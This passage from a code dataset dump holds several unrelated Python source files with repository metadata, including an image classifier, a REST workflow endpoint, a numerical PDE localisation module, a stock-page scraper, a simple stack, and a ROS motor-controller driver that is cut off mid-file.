:] = (0, 0, 0)\n print(\"Image No.\",n+1,\"Row\", i+1)\n\n print(\"Finish No:\" ,n+1)\n # Imglist_output[n] = image_mark_minion\n # img = Image.fromarray(image_mark_minion)\n # img.save(\"duck_stats.jpg\")\n\n# -----------------------------------------------Finish Method1\n\"\"\"\n# Method 2-----------------------------------------------\nminion_sample_head = sample_crop(Imglist[0], (70,367), (138,448))\nprint(\"Positive Sample:\",minion_sample_head.shape)\nsolve_Img = Image.fromarray(minion_sample_head, mode=\"RGB\")\nsolve_Img.save(\"minion_sample_head.jpg\")\n\nminion_sample_body = sample_crop(Imglist[0], (70,470), (128,530))\nprint(\"Positive Sample:\",minion_sample_body.shape)\nsolve_Img = Image.fromarray(minion_sample_body, mode=\"RGB\")\nsolve_Img.save(\"minion_sample_body.jpg\")\n\nbg_sample = sample_crop(Imglist[0], (470,460), (570,540))\nprint(\"Negative Sample:\",bg_sample.shape)\nsolve_Img_Bg = Image.fromarray(bg_sample, mode=\"RGB\")\nsolve_Img_Bg.save(\"bg_sample.jpg\")\n\n# train\nminion_sample_head = minion_sample_head.reshape(minion_sample_head.shape[0]*minion_sample_head.shape[1],3)\ntrainP_head=np.cov(minion_sample_head,rowvar=False)\ncov_ctr=np.diag(np.diag(trainP_head))\nD_mean=minion_sample_head.mean(axis=0)\nrv_ctr=multivariate_normal(D_mean,cov_ctr,allow_singular=True)\n\nminion_sample_body = minion_sample_body.reshape(minion_sample_body.shape[0]*minion_sample_body.shape[1],3)\ntrainP_body=np.cov(minion_sample_body,rowvar=False)\ncov_ctr_body=np.diag(np.diag(trainP_body))\nD_mean_body=minion_sample_body.mean(axis=0)\nrv_ctr_body=multivariate_normal(D_mean_body,cov_ctr_body,allow_singular=True)\n\n\nbg_sample = bg_sample.reshape(bg_sample.shape[0]*bg_sample.shape[1],3)\ntmp=np.cov(bg_sample,rowvar=False)\ncov=np.diag(np.diag(tmp))\nBg_mean=bg_sample.mean(axis=0)\nrv=multivariate_normal(Bg_mean,cov,allow_singular=True)\n\n\n#-----\n\n# -----\n\n\n# image_mark_minion[i] = np.zeros(Imglist[0].shape, dtype=np.uint8)\nImglist_output = Imglist.copy()\n\nfor n in range(1):\n # copy the image once per frame; copying inside the pixel loop would reset\n # ans on every iteration and throw away all previously classified pixels\n ans = Imglist[n].copy()\n for i in range(H): # H\n for j in range(W): # W\n if np.linalg.norm(ans[i, j] - D_mean) < np.linalg.norm(ans[i, j] - Bg_mean):\n ans[i, j, 0] = 255\n ans[i, j, 1] = 255\n ans[i, j, 2] = 255\n else:\n ans[i, j, 0] = 0\n ans[i, j, 1] = 0\n ans[i, j, 2] = 0\n print(i)\n io.imshow(ans)\n Imglist_output[n] = ans\n print(\"Finish No:\",n+1)\n # Imglist_output[n] = image_mark_minion\n # img = Image.fromarray(image_mark_minion)\n # img.save(\"duck_stats.jpg\")\n\n\n\n# Save image\n# create dir\nif not os.path.isdir(\"Output/\"):\n os.makedirs(\"Output/\")\n# save Image\nfor i in range(len(Imglist)):\n img = Image.fromarray(Imglist_output[i])\n fname = \"Output/\" + str(i + 1) + \".jpg\"\n img.save(fname)","sub_path":"Group19_0521/Minion.py","file_name":"Minion.py","file_ext":"py","file_size_in_byte":7138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"157751606","text":"from golem import actions\n\nfrom projects.golem_gui.pages import common\nfrom projects.golem_gui.pages.users import create_user\n\n\ndef setup(data):\n common.access_golem(data.env.url, data.env.admin)\n create_user.navigate_to_page()\n\n\ndef test(data):\n project = 'project1'\n permission = 'admin'\n create_user.select_project(project)\n create_user.select_permission(permission)\n actions.click(create_user.add_permission_button)\n create_user.assert_project_permission_in_table(project, 
permission)\n","sub_path":"projects/golem_gui/tests/users/create_user/add_project_permission.py","file_name":"add_project_permission.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"42082141","text":"import typing\n\nfrom flask_restful_swagger import swagger\n\nfrom manager_rest.rest import filters_utils, rest_decorators, rest_utils\nfrom manager_rest.security import SecuredResource\nfrom manager_rest.security.authorization import authorize\nfrom manager_rest.storage import (get_storage_manager,\n models)\n\nfrom ..responses_v2 import ListResponse\n\nif typing.TYPE_CHECKING:\n from typing import List, Iterable\n from manager_rest.rest.responses import Workflow\n\n\nclass Workflows(SecuredResource):\n @swagger.operation(\n responseClass='List[dict]',\n nickname=\"list\",\n notes=\"Returns a list of defined workflows.\"\n )\n @rest_decorators.marshal_list_response\n @rest_decorators.create_filters(models.Deployment)\n @rest_decorators.search('id')\n @rest_decorators.filter_id\n @authorize('deployment_list')\n def get(self, filters=None, search=None, filter_id=None, **kwargs):\n \"\"\"\n List workflows defined for deployments filtered by kwargs.\n \"\"\"\n _include = ['id', 'workflows']\n filters = filters or {}\n filters.update(rest_utils.deployment_group_id_filter())\n filter_rules = filters_utils.get_filter_rules_from_filter_id(\n filter_id, models.DeploymentsFilter)\n result = get_storage_manager().list(\n models.Deployment,\n include=_include,\n filters=filters,\n substr_filters=search,\n get_all_results=True,\n filter_rules=filter_rules,\n distinct=['_blueprint_fk'],\n )\n\n return workflows_list_response(result)\n\n\ndef workflows_list_response(deployments: 'Iterable') -> ListResponse:\n workflows = _extract_workflows(deployments)\n pagination = {\n 'total': len(workflows),\n 'size': len(workflows),\n 'offset': 0,\n }\n return ListResponse(items=[w.as_dict() for w in workflows],\n metadata={'pagination': pagination})\n\n\ndef _extract_workflows(\n deployments: 'List[models.Deployment]') -> 'List[Workflow]':\n workflows = set()\n for dep in deployments:\n workflows |= set(models.Deployment._list_workflows(dep.workflows))\n return list(workflows)\n\n\ndef _merge_workflows(w1: 'List[Workflow]',\n w2: 'List[Workflow]') -> 'List[Workflow]':\n workflows = {}\n for w in w1 + w2:\n workflows[w.name] = w\n return list(workflows.values())\n","sub_path":"rest-service/manager_rest/rest/resources_v3_1/workflows.py","file_name":"workflows.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"355681246","text":"from typing import *\nclass Solution:\n def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n \"\"\"\n 找到两个数组的中位数\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: float\n \"\"\"\n m, n = len(nums1), len(nums2)\n if m > n:\n # 进行一步交换,确保第一个数组比第二个小\n return self.findMedianSortedArrays(nums2,nums1)\n idx_min, idx_max, half_len = 0, m, (m + n + 1) // 2\n while idx_min <= idx_max:\n i = (idx_min + idx_max) // 2\n j = half_len - i\n if i < m and nums2[j - 1] > nums1[i]:\n idx_min = i + 1\n elif i > 0 and nums1[i - 1] > nums2[j]:\n idx_max = i - 1\n else:\n if i == 0:\n max_of_left = nums2[j - 1]\n elif j == 0:\n max_of_left = nums1[i - 1]\n else:\n max_of_left = max(nums1[i - 1], nums2[j - 1])\n if (m + n) % 2 == 1:\n return max_of_left\n if i == m:\n min_of_right = 
nums2[j]\n elif j == n:\n min_of_right = nums1[i]\n else:\n min_of_right = min(nums1[i], nums2[j])\n return (max_of_left + min_of_right) / 2","sub_path":"数学/寻找两个正序数组的中位数_4.py","file_name":"寻找两个正序数组的中位数_4.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"572239184","text":"from pymor.discretizers.cg import discretize_stationary_cg\nfrom pymor.operators.numpy import NumpyGenericOperator, NumpyMatrixOperator\nfrom pymor.operators.constructions import LincombOperator, induced_norm\nfrom pymor.grids.subgrid import SubGrid\nfrom pymor.grids.boundaryinfos import SubGridBoundaryInfo\nfrom pymor.vectorarrays.numpy import NumpyVectorSpace\nfrom lmor.localizer import NumpyLocalizer\nfrom lmor.partitioner import build_subspaces, partition_any_grid\nfrom lmor.discrete_pou import localized_pou\nimport numpy as np\nimport copy\n\n\ndef create_dirichlet_transfer(localizer, local_op, rhsop, source_space, training_space, range_space, pou):\n # Dirichlet-Transferoperator\n def transfer(va):\n range_solution = localizer.to_space(\n local_op.apply_inverse(-rhsop.apply(NumpyVectorSpace.make_array(va))), training_space, range_space)\n return pou[range_space](range_solution).data\n cavesize = len(localizer.join_spaces(source_space))\n rangesize = len(localizer.join_spaces(range_space))\n return NumpyGenericOperator(transfer, dim_source=cavesize, dim_range=rangesize, linear=True)\n\n\ndef create_dirichlet_solop(localizer, local_op, rhsop, source_space, training_space):\n # Dirichlet-Loesungsoperator\n def solve(va):\n solution = local_op.apply_inverse(-rhsop.apply(NumpyVectorSpace.make_array(va)))\n return solution.data\n cavesize = len(localizer.join_spaces(source_space))\n rangesize = len(localizer.join_spaces(training_space))\n return NumpyGenericOperator(solve, dim_source=cavesize, dim_range=rangesize, linear=True)\n\n\ndef create_robin_transfer(localizer, bilifo, source_space, omega_star_space, range_space, pou):\n # Robin-Transferoperator\n def transfer(va):\n g = localizer.to_space(NumpyVectorSpace.make_array(va), source_space, omega_star_space)\n solution = bilifo.apply_inverse(g)\n range_solution = localizer.to_space(solution, omega_star_space, range_space)\n return pou[range_space](range_solution).data\n cavesize = len(localizer.join_spaces(source_space))\n rangesize = len(localizer.join_spaces(range_space))\n return NumpyGenericOperator(transfer, dim_source=cavesize, dim_range=rangesize, linear=True)\n\n\ndef create_robin_solop(localizer, bilifo, source_space, omega_star_space):\n # Robin-Loesungsoperator\n def solve(va):\n g = localizer.to_space(NumpyVectorSpace.make_array(va), source_space, omega_star_space)\n solution = bilifo.apply_inverse(g)\n return solution.data\n cavesize = len(localizer.join_spaces(source_space))\n rangesize = len(localizer.join_spaces(omega_star_space))\n return NumpyGenericOperator(solve, dim_source=cavesize, dim_range=rangesize, linear=True)\n\n\ndef localize_problem(p, coarse_grid_resolution, fine_grid_resolution, mus=None, calT=False,\n calTd=False, calQ=False, dof_codim=2, localization_codim=2, discretizer=None, m=1):\n\n assert coarse_grid_resolution > (m+1)*2\n assert fine_grid_resolution % coarse_grid_resolution == 0\n\n print(\"localizing problem\")\n global_quantities = {}\n global_quantities[\"coarse_grid_resolution\"] = coarse_grid_resolution\n local_quantities = {}\n\n # Diskretisierung auf dem feinen Gitter:\n diameter = 1./fine_grid_resolution\n 
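# note (added): diameter is the fine-mesh cell width; the value 1/fine_grid_resolution presumably assumes a unit-square domain, which matches the posext fractions computed per subdomain further below.\n 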
global_quantities[\"diameter\"] = diameter\n if discretizer is None:\n discretizer = discretize_stationary_cg\n d, data = discretizer(p, diameter=diameter)\n grid = data[\"grid\"]\n\n global_quantities[\"d\"] = d\n global_quantities[\"data\"] = data\n\n global_operator = d.operator.assemble(mus)\n global_quantities[\"op\"] = global_operator\n global_quantities[\"op_not_assembled\"] = d.operator\n global_rhs = d.rhs.assemble(mus)\n global_quantities[\"rhs\"] = global_rhs\n\n op_fixed = copy.deepcopy(d.operator)\n\n # Skalierung der Dirichlet-Freiheitsgrade:\n try:\n dirichlet_dofs = data['boundary_info'].dirichlet_boundaries(dof_codim)\n for op in op_fixed.operators:\n op.assemble(mus).matrix[dirichlet_dofs, dirichlet_dofs] *= 1e5\n # d.rhs.assemble(mus)._matrix[:, dirichlet_dofs] *= 1e5\n except KeyError:\n pass\n\n global_operator_fixed = op_fixed.assemble(mus)\n global_quantities[\"op_fixed\"] = global_operator_fixed\n global_quantities[\"op_fixed_not_assembled\"] = op_fixed\n\n global_quantities[\"p\"] = p\n\n try:\n dmask = data['boundary_info'].dirichlet_mask(dof_codim)\n except KeyError:\n dmask = None\n\n # Konstruktion der Teilraeume:\n subspaces, subspaces_per_codim = build_subspaces(\n *partition_any_grid(grid, num_intervals=(coarse_grid_resolution, coarse_grid_resolution),\n dmask=dmask, codim=dof_codim))\n global_quantities[\"subspaces\"] = subspaces\n global_quantities[\"subspaces_per_codim\"] = subspaces_per_codim\n localizer = NumpyLocalizer(d.solution_space, subspaces['dofs'])\n global_quantities[\"localizer\"] = localizer\n\n def create_m_patch(xspace, m):\n for i in range(m):\n space = xspace\n cspace = tuple(set(i for k in space if subspaces[k]['codim']\n == 0 for i in subspaces[k]['cpatch'] if i not in space))\n xspace = tuple(set(i for k in cspace if subspaces[k]['codim']\n == 1 for i in subspaces[k]['env']) | set(space))\n cxspace = tuple(set(i for k in xspace if subspaces[k]['codim']\n == 0 for i in subspaces[k]['cpatch'] if i not in xspace))\n return xspace, cxspace\n\n pou = localized_pou(subspaces, subspaces_per_codim, localizer,\n coarse_grid_resolution, grid, localization_codim, dof_codim)\n global_quantities[\"pou\"] = pou\n spaces = [subspaces[s_id][\"env\"] for s_id in subspaces_per_codim[2]]\n global_quantities[\"spaces\"] = spaces\n\n full_l2_product = d.products[\"l2\"].assemble()\n full_h1_semi_product = d.products[\"h1_semi\"].assemble()\n k_product = LincombOperator((full_h1_semi_product, full_l2_product), (1, mus[\"k\"]**2)).assemble()\n global_quantities[\"full_norm\"] = induced_norm(k_product)\n global_quantities[\"k_product\"] = k_product\n for xpos in range(coarse_grid_resolution-1):\n for ypos in range(coarse_grid_resolution-1):\n # print \"localizing...\"\n s_id = subspaces_per_codim[localization_codim][ypos + xpos*(coarse_grid_resolution-1)]\n space = subspaces[s_id][\"env\"]\n ldict = {}\n local_quantities[space] = ldict\n ldict[\"pos\"] = (xpos, ypos)\n\n # Konstruktion der lokalen Raeume:\n range_space = subspaces[s_id][\"env\"]\n ldict[\"range_space\"] = range_space\n omega_space = tuple(sorted(set(subspaces[s_id]['env']) | set(subspaces[s_id]['cenv'])))\n ldict[\"omega_space\"] = omega_space\n training_space, source_space = create_m_patch(range_space, m)\n # source_space = subspaces[s_id][\"cxenv\"]\n ldict[\"source_space\"] = source_space\n # training_space = subspaces[s_id][\"xenv\"]\n ldict[\"training_space\"] = training_space\n omega_star_space = tuple(sorted(set(training_space) | set(source_space)))\n ldict[\"omega_star_space\"] = 
omega_star_space\n\n # lokale Shift-Loesung mit f(Dirichlet)\n local_op = localizer.localize_operator(global_operator, training_space, training_space)\n local_rhs = localizer.localize_operator(global_rhs, None, training_space)\n local_solution = local_op.apply_inverse(local_rhs.as_range_array())\n local_solution = localizer.to_space(local_solution, training_space, range_space)\n local_solution = pou[range_space](local_solution)\n ldict[\"local_solution_dirichlet\"] = local_solution\n\n # Dirichlet Transferoperator:\n rhsop = localizer.localize_operator(global_operator, training_space, source_space)\n transop_dirichlet = create_dirichlet_transfer(\n localizer, local_op, rhsop, source_space, training_space, range_space, pou)\n ldict[\"dirichlet_transfer\"] = transop_dirichlet\n\n # subgrid\n xmin = max(0, xpos - m)\n xsize = min(xpos + 2+m, coarse_grid_resolution) - xmin\n ymin = max(0, ypos - m)\n ysize = min(ypos + 2+m, coarse_grid_resolution) - ymin\n ldict[\"posext\"] = [(xmin/coarse_grid_resolution, ymin/coarse_grid_resolution),\n ((xmin+xsize)/coarse_grid_resolution, (ymin+ysize)/coarse_grid_resolution)]\n mysubgrid = getsubgrid(grid, xmin, ymin, coarse_grid_resolution, xsize=xsize, ysize=ysize)\n mysubbi = SubGridBoundaryInfo(mysubgrid, grid, data['boundary_info'], 'robin')\n ld, ldata = discretizer(p, grid=mysubgrid, boundary_info=mysubbi)\n lop = ld.operator.assemble(mus)\n\n # index conversion\n ndofsext = len(ldata['grid'].parent_indices(dof_codim))\n global_dofnrsext = -100000000 * np.ones(shape=(d.solution_space.dim,))\n global_dofnrsext[ldata['grid'].parent_indices(dof_codim)] = np.array(range(ndofsext))\n lvecext = localizer.localize_vector_array(\n NumpyVectorSpace.make_array(global_dofnrsext), omega_star_space).data[0]\n\n # Robin Transferoperator:\n bilifo = NumpyMatrixOperator(lop.matrix[:, lvecext][lvecext, :])\n transop_robin = create_robin_transfer(localizer, bilifo, source_space, omega_star_space, range_space, pou)\n ldict[\"robin_transfer\"] = transop_robin\n\n # lokale Shift-Loesung mit f(Robin)\n lrhs = ld.rhs.assemble(mus)\n llrhs = NumpyMatrixOperator(lrhs.matrix[lvecext.astype(int)])\n local_solution = bilifo.apply_inverse(llrhs.as_range_array())\n ldict[\"local_sol2\"] = local_solution\n local_solution = localizer.to_space(local_solution, omega_star_space, range_space)\n local_solution_pou = pou[range_space](local_solution)\n ldict[\"local_solution_robin\"] = local_solution_pou\n\n if calT:\n # Transfer-Matrix:\n ldict[\"transfer_matrix_robin\"] = transop_robin.as_range_array().data.T\n\n if calTd:\n # Transfer-Matrix:\n ldict[\"transfer_matrix_dirichlet\"] = transop_dirichlet.as_range_array().data.T\n\n # Konstruktion der Produkte:\n range_k = localizer.localize_operator(k_product, range_space, range_space)\n omstar_k = LincombOperator((\n NumpyMatrixOperator(ld.products[\"h1_semi\"].assemble().matrix[:, lvecext][lvecext, :]),\n NumpyMatrixOperator(ld.products[\"l2\"].assemble().matrix[:, lvecext][lvecext, :])),\n (1, mus[\"k\"]**2)).assemble()\n\n ldict[\"omega_star_product\"] = omstar_k\n ldict[\"range_product\"] = range_k\n\n if calQ:\n # Loesungs-Matrix:\n solution_op_robin = create_robin_solop(localizer, bilifo, source_space, omega_star_space)\n Q_r = solution_op_robin.as_range_array()\n ldict[\"solution_matrix_robin\"] = Q_r.data.T\n source_Q_r_product = NumpyMatrixOperator(omstar_k.apply(Q_r).data.T)\n ldict[\"source_product\"] = source_Q_r_product\n\n lproduct = localizer.localize_operator(full_l2_product, source_space, source_space)\n lmat = 
lproduct.matrix.tocoo()\n lmat.data = np.array([4./6. * diameter if (row == col) else diameter / 6.\n for row, col in zip(lmat.row, lmat.col)])\n ldict[\"source_product\"] = NumpyMatrixOperator(lmat.tocsc().astype(np.cfloat))\n\n return global_quantities, local_quantities\n\n\ndef getsubgrid(grid, xpos, ypos, coarse_grid_resolution, xsize=2, ysize=2):\n assert 0 <= xpos <= coarse_grid_resolution - 2\n assert 0 <= ypos <= coarse_grid_resolution - 2\n\n xstep = float(grid.domain[1][0] - grid.domain[0][0])/coarse_grid_resolution\n ystep = float(grid.domain[1][1] - grid.domain[0][1])/coarse_grid_resolution\n\n xmin = grid.domain[0][0] + xpos*xstep\n xmax = xmin + xsize*xstep\n\n ymin = grid.domain[0][1] + ypos * ystep\n ymax = ymin + ysize*ystep\n\n def filter(elem):\n return (xmin <= elem[0] <= xmax) and (ymin <= elem[1] <= ymax)\n\n mask = [filter(e) for e in grid.centers(0)]\n indices = np.nonzero(mask)[0]\n return SubGrid(grid, indices)\n","sub_path":"src/lmor/localize_problem.py","file_name":"localize_problem.py","file_ext":"py","file_size_in_byte":12501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"837342","text":"from features.steps.deciders import ArgonautObservationDecider\nfrom tests.testvitals import VitalsResource\nfrom features.steps.argonaut import found_at_least_one\n\n\ndef test_argonaut_validation():\n resources = VitalsResource().get_resources()\n\n assert ArgonautObservationDecider(resources[0]).should_validate()\n assert not ArgonautObservationDecider(resources[1]).should_validate()\n\n\ndef test_found_one():\n resources = VitalsResource().get_resources()\n\n resource_path = \"Observation.category.coding.code\".split(\".\")\n resource_path.pop(0)\n\n fake_resource = resources[0]\n\n assert found_at_least_one([fake_resource], resource_path, \"vital-signs\")\n\n fake_resource[\"category\"][\"coding\"][0][\"code\"] = \"not-vital-signs\"\n\n assert not found_at_least_one([fake_resource], resource_path, \"vital-signs\")\n","sub_path":"tests/test_steps.py","file_name":"test_steps.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"180854649","text":"from bs4 import BeautifulSoup as soup\nfrom urllib.request import urlopen as uReq\n\nmy_url = \"https://in.tradingview.com/markets/stocks-india/market-movers-losers/\"\n\nuClient = uReq(my_url)\npage_html = uClient.read()\nuClient.close()\n\n\npage_soup = soup(page_html,\"html.parser\")\n\ncontainers = page_soup.findAll(\"tr\",{\"class\":\"tv-data-table__row tv-data-table__stroke tv-screener-table__result-row\"})\ncount = 0\n\nfilename = \"toploss.csv\"\nf = open(filename,\"w\")\nheaders = \"company,Close_val,Perc_inc,Stockval_change,Market_opinion,Vol_trade,Marketcap \\n\"\nf.write(headers)\n\nfor container in containers:\n count = count + 1\n\n if count == 11:\n break\n else:\n values = container.find_all(\"td\")\n\n i=0\n for value in values:\n i=i+1\n\n if i==1:\n company = value.span.text.strip()\n print(\"company \" + value.span.text.strip())\n\n if i==2:\n Close_val = value.text.strip()\n print(\"Closing Value: \" + value.text.strip())\n\n if i==3:\n Perc_inc = value.text.strip()\n print(\"Perc increase: \" + value.text.strip())\n\n if i==4:\n Stockval_change = value.text.strip()\n print(\"Val Changed: \" + value.text.strip())\n\n if i==5:\n Market_opinion = value.text.strip()\n print(\"Buy Or Sell: \" + value.text.strip())\n\n if i==6:\n Vol_trade = value.text.strip()\n 
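# table layout on the movers page: cell 6 holds the traded volume and cell 7 (handled below) holds the market cap\n 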
print(\"Vol Traded: \" + value.text.strip())\n\n if i==7:\n Marketcap = value.text.strip()\n print(\"Market Capital: \" + value.text.strip() + \"\\n\")\n\n\n\n f.write(company + \",\" + Close_val + \",\" + Perc_inc + \",\" + Stockval_change + \",\" + Market_opinion + \",\" + Vol_trade + \",\" + Marketcap + \"\\n\")\nf.close()\n","sub_path":"toploss.py","file_name":"toploss.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"261423487","text":"from collections import deque\n\nfrom transducer.infrastructure import Reduced\nfrom transducer.reducers import appending\n\n\n# Transducible processes\n\nasync def transduce(transducer, aiterable):\n r = transducer(appending())\n accumulator = deque()\n reduced = False\n async for item in aiterable:\n accumulator = r.step(accumulator, item)\n if isinstance(accumulator, Reduced):\n accumulator = accumulator.value\n reduced = True\n\n while accumulator:\n yield accumulator.popleft()\n\n if reduced:\n break\n\n completed_result = r.complete(accumulator)\n assert completed_result is accumulator\n\n while accumulator:\n yield accumulator.popleft()\n","sub_path":"transducer/lazy_coop.py","file_name":"lazy_coop.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"309652592","text":"# Command Interface\n# Author: Darren Midkiff <d.claymidkiff@gmail.com>\n# rLoop Software Engineering Team\n\n#dummy value\nnodes = []\n\ndef attach_to_bus():\n return\n\n\ndef collect_logs():\n myLog = open(\"commandInterfaceLog.txt\", \"r\")\n newLog = open(\"log.txt\", \"r+\")\n newLog.write(\"Combined Log\" + \"\\n \\n\" + myLog.read())\n for node in nodes:\n \tnewLog.write(node.get_log() + \"\\n \\n\")\n log = newLog.read()\n myLog.close()\n newLog.close()\n return log\n\ncollect_logs()\n","sub_path":"pod/command_interface/command_interface.py","file_name":"command_interface.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"87542395","text":"# Oving 2 ITGK\r\n# -*- coding: utf8 -*-\r\n\r\n# Oppgave 6 Fibonacci \r\n\r\ndef fibonacci():\r\n\r\n k = int(input(\"Hvor mange Fibonacci-tall vil du regne ut? 
\"))\r\n f = [0] * (k+1)\r\n f[0] = 0\r\n f[1] = 1\r\n print(f[0])\r\n print(f[1])\r\n sum1 = 1\r\n i = 2\r\n for i in range(i,k+1):\r\n f[i] = f[i-1] + f[i-2]\r\n print(f[i])\r\n sum1 += f[i]\r\n\r\n print(\"Summen av tallene er: \", sum1)\r\n\r\nfibonacci()\r\n\r\n \r\n\r\n","sub_path":"Oving 3/oppgave_6.py","file_name":"oppgave_6.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"295850104","text":"# Simple Stack using a singly-linked list\n\nfrom node import Node\n\n\nclass Stack:\n def __init__(self):\n self.head = None\n self.length = 0\n\n def push(self, cargo):\n my_node = Node(cargo)\n my_node.next = self.head\n self.head = my_node\n self.length += 1\n\n def pop(self):\n # remove node from head of list\n if self.is_empty():\n print('Error: underflow')\n else:\n temp_node = self.head\n self.head = temp_node.next\n temp_node.next = None\n self.length -= 1\n return temp_node.cargo\n\n def search(self, target):\n current = self.head\n while not self.is_empty():\n if current == target:\n return current\n else:\n current = current.next\n\n def is_empty(self):\n return self.length == 0\n\n def print_stack(self):\n # pops and print nodes in the stack\n while not self.is_empty():\n print(self.pop(), \" \")\n\n\nmy_stack = Stack()\narr = [54, 35, 62, 31, 56, 67, 11, 3]\n\nfor items in arr:\n my_stack.push(items)\n\nmy_stack.print_stack()\n\n\n\n","sub_path":"sample/stack1.py","file_name":"stack1.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"192639196","text":"#可用于下拉框也可用于搜索建议\nfrom commonfunc import loadFirefox\ndriver=loadFirefox()\ndriver.get('https://www.baidu.com')\nelement=driver.find_element_by_id('kw')\n\nelement.send_keys('java')\nelement.click()\noverform=driver.find_element_by_xpath(\"//*[@id='form']/div[1]\")\n\noptions_list=overform.find_elements_by_tag_name('li')\nfor option in options_list:\n\tvalue=option.get_attribute(\"data-key\")\n\tprint(value)\n\n#如果是select标签 则直接用select类操作选择\n# myselect=Select(driver.find_element_by_id(\"udp\"))\n# myselect.select_by_visible_text('Audi')\n# myselect=Select(driver.find_element_by_id(\"udp\"))\n# options=myselect.options()\n# for each in options:\n# \tprint(each.text)","sub_path":"BaiduCloud_WEB/Test_Worklist/获取下拉框所有内容.py","file_name":"获取下拉框所有内容.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"5835200","text":"#!/usr/bin/env python3\nimport rospy\nfrom pyvesc import VESC\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import Joy\nfrom rccar_jetson.msg import vesc_feedback\nfrom autoware_msgs.msg import VehicleCmd\nfrom math import *\n\nmeter_per_rotate = 0.330\nwheel_rpm_per_speed = 99.4213/9\nms_per_speed = (meter_per_rotate * wheel_rpm_per_speed) / 60\nspeed_per_ms = 1 / ms_per_speed * 1.3\nwheelbase = 0.320\n\nclass RC_driver():\n def __init__(self):\n self.errCount = 0\n self.max_errCount = 5\n self.serial_port = rospy.get_param('~serial_port','/dev/vesc')\n self.steer_offset = rospy.get_param('~steer_offset', -4.5) \n self.rev_steer_offset = rospy.get_param('~rev_steer_offset',3.8) \n self.wheelbase = rospy.get_param('~wheelbase',0.320)\n self.maxSteer = rospy.get_param('~maxSteer',0.52) # rad\n self.tacho_jitter_threshold = rospy.get_param('~tacho_jitter_threshold',60)\n self.connectVESC()\n self.getInitialTacho()\n 
self.tacho_err = 0\n self.autoMode = 0\n self.lastMode = 0\n self.steer_rad = 0.0\n self.speed_cmd = 0\n self.steer_cmd = 0\n self.init_tacho = self.set_and_get_vesc(0, 50)\n\n self.feedback_msg = vesc_feedback()\n self.vehiclecmd = VehicleCmd()\n\n self.feedbackPublisher = rospy.Publisher('/vesc_feedback', vesc_feedback, queue_size=1)\n \n # rospy.Subscriber(\"/cmd_vel\",Twist ,self.cmd_velCallback) # auto\n rospy.Subscriber('/vehicle_cmd', VehicleCmd, self.vehiclecmdCallback)\n\n rospy.Subscriber(\"/joy_cmd\",Twist ,self.joy_cmdCallback)\n rospy.Subscriber(\"/joy\",Joy ,self.joyCallback)\n \n \n rospy.sleep(0.05)\n\n def connectVESC(self):\n try:\n self.motor = VESC(serial_port=self.serial_port)\n except Exception as e:\n rospy.logwarn(\"Opening serial failed during init! reconnecting %d times\" % (self.errCount + 1))\n rospy.sleep(3)\n self.handleException(e)\n self.connectVESC() # retry; the recursive call sets self.motor itself on success\n self.errCount = 0\n\n def getInitialTacho(self):\n try:\n self.init_tacho = self.last_tacho = int(self.motor.get_measurements().tachometer)\n except Exception as e:\n rospy.logwarn(\"Getting initial tacho failed during init! reconnecting %d times\" % (self.errCount + 1))\n rospy.sleep(1)\n self.handleException(e)\n self.getInitialTacho()\n self.errCount = 0\n\n def joyCallback(self, data):\n if data.axes[3] == -1.0:\n if self.lastMode == 0:\n self.speed_cmd = 0\n self.steer_cmd = 0\n self.autoMode = 1\n self.lastMode = 1\n else:\n if self.lastMode == 1:\n self.speed_cmd = 0\n self.steer_cmd = 0\n self.autoMode = 0\n self.lastMode = 0\n\n def vehiclecmdCallback(self, data):\n if self.autoMode == 0:\n return\n lin_cmd = data.ctrl_cmd.linear_velocity\n ang_cmd = data.ctrl_cmd.steering_angle\n self.cal_cmd(lin_cmd, 0)\n self.steer_cmd = degrees(ang_cmd)\n\n def joy_cmdCallback(self, data):\n self.manualCmdLinear = data.linear.x\n self.manualCmdAngular = data.angular.z\n if self.autoMode == 1:\n return\n self.cal_cmd(self.manualCmdLinear, self.manualCmdAngular)\n \n def cmd_velCallback(self, data):\n if self.autoMode == 0:\n return\n self.cal_cmd(data.linear.x, data.angular.z)\n \n def cal_cmd(self, lin_spd, ang_spd):\n # if 0.1 < lin_spd < 0.7:\n # lin_spd = 0.7\n self.speed_cmd = lin_spd * speed_per_ms\n \n if lin_spd != 0:\n self.steer_rad = atan(wheelbase / lin_spd * ang_spd)\n else:\n self.steer_rad = 0\n if self.steer_rad > self.maxSteer:\n self.steer_rad = self.maxSteer\n if self.steer_rad < -self.maxSteer:\n self.steer_rad = -self.maxSteer\n self.feedback_msg.steer.data = self.steer_rad\n self.steer_cmd = degrees(self.steer_rad)\n\n def set_and_get_vesc(self, speed, steer):\n try:\n if speed < 0:\n self.motor.set_servo((50 - steer*1.4 - self.rev_steer_offset) / 100) # 1.8 -> servo/steer(deg)\n # 